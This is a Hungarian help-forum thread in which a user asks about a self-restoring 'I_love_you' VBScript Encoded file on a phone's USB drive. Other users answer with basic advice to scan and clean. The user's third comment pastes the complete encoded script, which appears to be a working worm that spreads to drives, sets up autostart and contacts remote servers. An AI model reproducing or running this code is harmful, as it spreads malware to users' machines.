Kezdőoldal » Számítástechnika » Egyéb kérdések » Mi lehet ez? Légyszives aki...

Mi lehet ez? Légyszives aki ért hozzá, az segítsen!

Figyelt kérdés
USB-kábellel csatlakoztattam a telómat a géphez, és amikor csatlakoztatva van, akkor az F meghajtón vannak a telóról a cuccaim. Na most, megjelent egy VBScript Encoded Script File, amit nem tudok eltüntetni. Letörlöm, de miután letöröltem, újra megjelenik, és egy csomószor visszajön, és nem tudom letörölni. Az a neve a fájlnak egyébként, hogy I_love_you. A fene tudja mi ez. Lefuttattam egy keresést erre a címre hivatkozva, és csak az F meghajtón található, tehát a telómon van.
2012. febr. 12. 22:38
1 2
 1/11 A kérdező kommentje:
Az USB-t se vehetem a gépből, mert azt írja, hogy: Az eszközt (Általános kötet) pillanatnyilag nem lehet leállítani. Próbálja újra később."
2012. febr. 12. 22:40
 2/11 anonim ***** válasza:
Jobb gomb-szerkesztés, mutasd, mit ír benne!
2012. febr. 12. 22:55
Hasznos számodra ez a válasz?
 3/11 A kérdező kommentje:

Hát a jegyzettömb nyitja meg, és semmi kód, csak ilyenek:

#@~^mBUAAA==G PnMDKDPM+k;:PU+XY@#@&9k:,-+M/kKU@#@&7+M/rW~x,JXJ@#@&3X~x,JxGO4kUor@#@&DnTYb:+MP{~JZJ@#@&@#@&dnDP0m%V,'P1.nlD+K4%+^OvJdmMrwDkULc0ksnkXdYhK4%mDJ#@#@&UnY,/4+^V~x,?1.kaYR;.nlD+}4%+^OvJ ?1.kaY j4+VsE*@#@&@#@&@#@&/nDPXP',0m%VconY6ksnvh/1.kaYRk^.kaY6EsVUCs+b@#@&d+DPAr wlO4,'~0m%^RLYkw+1kms0KV[+M`qb@#@&@#@&j+DPCDO2P{P;DnlOn}4%+1O`rrU_YY2 qkUCDOaIn$E/Yc*cqJ*@#@&P@#@&@#@&b0P6CL^R0bsn+XkkYd`Ar wCY4QJ'rUcfSJ 74nJ*~Dtn @#@&P@#@&Ps/@#@&Ps/L8K6`r)P6áLV,rUmbl^k"áVádC,xn:,h+T0nsVőJb@#@&PaR1GaXcSk wlDt3E-qkURGSJ 74+rb@#@&P/4nsVcDoADrOPECn35|S6/zS{\);C(1AwUro:zI2'Hb^DK/G0D- r NWSd-;EDMnUYj+M/rWUw`IJ-`]Sr~Ei"SJ@#@&,DnwK.D@#@&x9Pk6@#@&@#@&ktnV^R]nTDbO+,JCn3e{dr;bJ{\);C(1Aw?}sP zI2w\bm.WkG6Ywqk NWS/'/EMDnxD.n.kkW wI!x-qrURGSdR-4nEBPAk 2lDt'E'kU GSJR78J@#@&@#@&@#@&@#@&@#@&@#@&B&zJz&&JzzJ&zJzzJ&&zJzJz&z&&Jz&zJ&zJz&&Jzz&&Jz&zJ&Jz&JzJzzJzJ&zJz&zJ@#@&@#@&@#@&@#@&@#@&/E(~;w9lD+c#@#@&,tOYa Wa+U~rM2PEBPEtDOa)&JEk+DkRmOhct;zmxLn^4lM.l1ENm&-+M/bW YaOr~~sms/@#@&~4YY2 k+UN@#@&,kW,tDYwcDdwKxd+D+aO,@*P7nDkkW,O4+ @#@&P~tOOaRGwUPrM3Pr~PE4DY2)J&!/nM/clYSR4;zmxL+^4C.Mlm![lJ/W!.^+cYXYE~~omVd+@#@&P,tOOaR/nU9@#@&P,jY~!P{P0mL^ ra+UK6OobV+vAk wlD4QJ'bx fJJc\8+rS BPP.!+#@#@&,P;Rq.bYndk +P4YD2RM+dwKxdnD+6D@#@&,P/4nsVcI!x~hrUalOt3E-qkU GSS -(+E@#@&~,hd1DbwYc;!rY@#@&~+ N~r6@#@&UN,/E(@#@&@#@&/!4~N.r7+c#,@#@&,/nO,NDr-/~',WmLscNMk\/@#@&P6W.Pl^4,NkkVNMk\~rx,NMk-+d@#@&P~k6~Nb/V[Mk\n 9Dr\OHwn{F,Ytx@#@&P,Pr0,xGO,0lNsR6kVnakkYk`[kdV9Dr\ NMk-n^+YOnM_E)'(|VG7+|XW!R78+r#~Y4+U@#@&PP,aR1WwHc[kk39Dr\n 9Dr\s+DYn.3J)w(|VG\mHW;c\(+J*@#@&~P,+UN,kW@#@&PPUN,k0@#@&~x6D@#@&+U[,/;4@#@&@#@&/;8,:+ddmon`*@#@&P~,:ko4K6v.kTtO`4YO2cD+k2W /+DnaYBVxctOOaR.+k2W /nO6YbRF#b@#@&n N~kE(@#@&@#@&k;4,W2+ hn8kkYc#@#@&P,~d+DPK4%q3~{P/DCYr8%mYcE&xO+MUY3Xw^WDDc)waVrmmYrG J#@#@&P,PW(%(2chbNOt~xR!T@#@&~P,W8%&2R4nbo4Y,x,vTZ@#@&PP,W(%qAR#kkk8sP',q@#@&PP,G8L&2c1C\rLmYn`Mro4Yc4DYw ./2W dYnXYBV+ `4OYaR.+kwGUk+YaY*OFybb@#@&+ N~/;8@#@&@#@&k;4,W2n tk[nS+8/bO`b@#@&,PPk+D~W(L(2,'~/M+lDnr(L+1OcJ&xD+.xnOA62VK.+MR)2aVk^CDkGxrb@#@&~,PK4L&2c#kkk8VPx~Z@#@&,~PK4L&3 1m\boCYncMkLtDctDY2 M+/2G /nYaD~sxvtYDwc.+kwGxk+OnXY# qv*#@#@&nUN,/!4@#@&@#@&kE8PMnwKDOc*@#@&~~,/nY,G(L(AP{PZM+mO+}4%+1YcE&xY.xY2X2sWM+MR)w2sbmCYbGxr#@#@&,PPG8Nq3Rjrkk8^+,'PZ@#@&~P,W8L&2 Hm\kTCY`J4OOw=zJEd+.dclOhc4EJlULV4C.Ml^E9CJWU^k +R4Yssg1Wh:mx[xM+wK.Yr#@#@&~~PS/1DrwO kVn+ac*Z!Tb@#@&P~~K4%qA $ErD@#@&@#@&x9~/!4@#@&@#@&d;(PDLkkY+Mcb@#@&PM+LYrhD~',.+TYrhD_q@#@&P@#@&,~,kW,xKYP6lNsR6ks+6rdD/`SrxalY4QE-0+HRO6OE*POtU@#@&P~~,?+O~MPx0m%^R6a+ K+XYwrV`Ak wCO4_J'V+HRYXOE~y~,K.Enb@#@&~P,~Imx[Gskyn@#@&P~P,VX~{P&xYv`O1,O,1,OPR~8!!ZT!Z!P3~q#,e,IUN~Q,FT!ZT!Z!b@#@&PP~~MRADbOVr +v3+H#@#@&P,P~DcmsGk+@#@&~P,P/O~W(L&2~'~/M+CY64N+^OvJqUODU+D3XwsKDDRzwask1lOkKxEb@#@&P,~PK4L&3 .b/b4s+~x,!@#@&,~P,W8%&2RHC7kLlDnvJ4DYa)zJEknDkRCYSR4;JlxTnV(lDMC^E9lJDnordD+.Ra4wQ3nz{J[VnH#@#@&,~,PAkmMkwDRks+wc*Z!Tb@#@&P,~PK4L&3 ;!kDP~P@#@&,P~+ [Pb0@#@&,PP@#@&,P~k6~0+z,'rxWDtbUorPOtx@#@&,PP,j+DPD,xWlNVcr2+UP6Osbs+vhrUalY4Qr-V+H D6Or~8#@#@&d0nX,'~DcDnC9Vk n@#@&dDc^sWk+@#@&~P~n N~k6@#@&,P~@#@&PkW~M+LYbhD~{P2!!,Y4nx@#@&~P,PdnDPW(%qAP',/.+mYr8Ln^D`Eq O+MxnOA6wsGM+.Rz2aVr1lDkW J*@#@&,P~PK4%(AR.bdk(V+,x~!@#@&,P~PG8Nq3RgC\boCO`J4ODwlzJ;k+.kRmYhct!&l onV(l..mmE9CzM+obdO+MRat2gVnH'E[0nX*@#@&~,PPAd1DrwD kVnwv*!Z!*@#@&,P~PK4%(AR;!rY,P@#@&7.+TYb:nD~x,JTJ@#@&Px[~b0P@#@&x[Pk;(@#@&@#@&kE4,NKAx^WCNv#@#@&@#@&@#@&r0,xWD~WlNVc0rVnnXkdYkchbx2CDtPQE'JQPMrTtOvtDYwcDdwKxd+D+aOBG#*~Y4+x@#@&~/DDwks+i]dPxPMro4Yc4DYw ./2W dYnXYBV+ `4OYaR.+kwGUk+YaY*O,*@#@&PkYMC9SG^mYrW ~',hrUalY4Qr-E_MrTtOvtDYwcDdwKxd+D+aOBG#,~P,@#@&,jnY,W(LpHJu:KKP{~ZM+COr4%n1YcJtjoHJyRoHS_K:KJ*@#@&PK4%ptSC:PncWwU~JV2:JSPdOMsrViId~~WmV/n@#@&PG4NptSu:KhR/x9c#@#@&~q6PG8N(HduK:nRUOCY!/,'~ TT,K4+ @#@&,?nO,W4%)GrjYMnm:~{P;D+mY64N+^YvJ)9}fAcjYM+lsEb@#@&PK4%b96UY.+mhR}wnU@#@&PG8Nb9rUOM+CsR:XwP{~F,BCN:X2n~kxm.X@#@&PK8%bGrUY.+Chc.kDnPK4%ptSCPPhR]+k2KxdAKNX@#@&,G4Nb9rUY.nm:RhG/bYkKU~',!,P~PvjY~Y4nPkY.nm:P2GkkOkKU,YG,Y4+PkYm.Y@#@&~?Y~G(LsU6P{PZMnCYW(LnmOcr?^Db2YbxL wkVnjH/O+s6(Ln1Yr#@#@&P&WPK4%sUr obV+akkY/vdOD_fdW^lOrKxbP:4+ PG8Ns?6 G+s+DnwksPkYD_fdGmmYrW @#@&~U+Y,G4Ns?}~xPgWDtrxL@#@&PG4N)f}?O.l: jm\nKKobVn,/DDCGSK^lDkGx@#@&~G(LbG6?DD+mh Z^Wk+@#@&~jY~W(%bGrjOM+lh~{PHWD4bxL@#@&,2x9PbW@#@&Pj+DPG8N(HduK:nP{~HWDtbxL@#@&~UtnV^ I!x~AbxwCO4PQJ'E3P.bo4Y`4YD2RM+dwKxdnD+6DSG*@#@&U[Pb0@#@&nx[~kE8@#@&@#@&,P@#@&@#@&@#@&vJz&zJ&Jz&JzJzzJzJ&zJz&zJz&&JzzJ&zJzzJ&&zJzJz&z&&Jz&zJ&zJz&&Jzz&&Jz&zJ&Jz&JzJzzJzJ&zJz@#@&kE8~`ISvb@#@&@#@&,4OYaRKwnx~EV2PJB~J4YO2=zz;dDdRmOSR4!zmxoV(CDMl^E9l&nMDWM YXYJB~ol^/@#@&P4ODw /UN@#@&~@#@&PkW~ktnV^ M+LM+mN`rCn35|S6ZzSm\zZC&H2'?rwP b"2'Hrm.GkWWY' k NGAk-Z;.M+UYjnM/rKx'jId-`]Sr#~',tOOaRDdwKx/On6DPDtnx~~@#@&~+^d+@#@&~~kt+sscDnoS.bYn,J_|2I{d6ZzSmHzZu(g2-U6s:b"3wHbmMWdWWO'rx9Ghk-/;MD+UOj+./bG -i"S'jIdJB4YDw D/2G /+Dn6D@#@&,~@#@&,Pb0~VnWD`4YD2RM+d2Kx/nO6O~Fb{Jhko(W6,J,Otx@#@&,P~h//mL+@#@&P,nUN,k6@#@&P~@#@&P~k6~V0Oc4YY2 M+dwKUk+O6D~c*'r.E PEPDtnU@#@&P,~D!x@#@&~~+ N,kW@#@&~,@#@&P,r0,VnWD`tOOaR.+k2KxdY6YBFyb'rW2+ hn8kkY~J,YtU@#@&,P,W2+UA4dkDn@#@&P~n NPrW@#@&~P@#@&,Pr6P^+0D`4OYaR.+kwGUk+YaYBFv*xEWa+ trNnA4dkDnPrPO4x@#@&~,PGwU4k[h4/bY@#@&,Pnx9Pr

2012. febr. 12. 23:52
 4/11 A kérdező kommentje:
Szóval nem tudom, hogy mi. Esetleg beállíthatom talán hogy mással nyissa meg? Megnézem, pill.
2012. febr. 12. 23:53
 5/11 A kérdező kommentje:
Na a következő van: semmivel nem tudom megnyitni meg semmi. Társítottam az XML editorhoz, és ott azt kérdezi tőlem, hogy megnyitom-e vagy mentem a fájlt.
2012. febr. 12. 23:55
 6/11 A kérdező kommentje:
De nem nyitottam meg meg nem is mentem.
2012. febr. 13. 00:00
 7/11 anonim ***** válasza:

Szerintem valami vírus

Ez most akkor a telón van?

akkor kéne rá egy szoftverezés

2012. febr. 13. 00:57
Hasznos számodra ez a válasz?
 8/11 anonim ***** válasza:
Elnéztem, nem sima VBScript, hanem Encoded...
2012. febr. 13. 16:25
Hasznos számodra ez a válasz?
 9/11 anonim ***** válasza:
Nem tudom, mi lehet, de a nevéből ítélve le kell takarítani, mint a sicc! :) Telefon szoftverét nem kell bántani, a gép csak az adattárolásra használt fájlrendszeréhez fér hozzá, onnan meg a teló úgy sem tud mit kezdeni ezzel a fájlformátummal. Víruskeresés, esetleg spyware keresés a gépen, AZUTÁN a telefonon. (Ha memkártyán van, érdemes azt még a telefonnal formázni.)
2012. febr. 13. 16:28
Hasznos számodra ez a válasz?
 10/11 A kérdező kommentje:
A gépen még ma hajnalban (mert addig vagyok fent) lefuttattam a víruskeresést. A gépen nem talált semmit. A telómon van és NEM TUDOM letakarítani onnan, mert modom, hogy akárhányszor kitörlöm, újra megjelenik. Amúgy Blackberrym van, ha ez számít valamit, és van egy Blackberry nevű mappám is, amiben benne van a többi mappa: fényképek, videók, zenék, telefonszámok...stb., és ez a szkript nem a mappákban van, hanem azokon kívül. Most akkor mit csináljak? Telómon ilyen még nem fordult elő. Akkor most mit csináljak. Valaki koordináljon vagy segítsen légyszi.
2012. febr. 13. 17:01
1 2

Kapcsolódó kérdések:




Minden jog fenntartva © 2024, www.gyakorikerdesek.hu
GYIK | Szabályzat | Jogi nyilatkozat | Adatvédelem | Cookie beállítások | WebMinute Kft. | Facebook | Kapcsolat: info(kukac)gyakorikerdesek.hu

A weboldalon megjelenő anyagok nem minősülnek szerkesztői tartalomnak, előzetes ellenőrzésen nem esnek át, az üzemeltető véleményét nem tükrözik.
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!